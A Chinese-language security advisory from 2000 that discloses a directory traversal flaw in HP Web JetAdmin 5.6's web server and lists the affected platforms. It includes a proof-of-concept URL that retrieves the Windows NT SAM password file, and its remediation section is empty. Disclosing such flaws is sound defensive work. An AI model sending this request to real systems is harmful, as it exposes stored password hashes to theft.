漏洞发布时间:2000-5-24 17:57:00
漏 洞 描 述:
Ussrlabs安全小组在HP Web JetAdmin Version 5.6 Web interface Server(默认端口8000)上发现:使用包含有../字符串的url请求,攻击者能够读取web
发布目录下的任意文件。
受影响的版本
HP Web JetAdmin Version 5.6 (Microsoft Windows 2000)
HP Web JetAdmin Version 5.6 (Microsoft Windows NT 4.0)
HP Web JetAdmin Version 5.6 (HP-UX 10.20) (未测试)
HP Web JetAdmin Version 5.6 (HP-UX 11.x) (未测试)
HP Web JetAdmin Version 5.6 (Linux - SuSE) (未测试)
HP Web JetAdmin Version 5.6 (Novell NetWare) (未测试)
HP Web JetAdmin Version 5.6 (Red Hat Linux) (未测试)
HP Web JetAdmin Version 5.6 (Solaris) (未测试)
漏洞测试程序如下:
请求下面的url,将会获取NT的sam.
http://ServerIP:8000/cgi/wja?page=/../../../WINNT/repair/sam._
to
解 决 方 法:
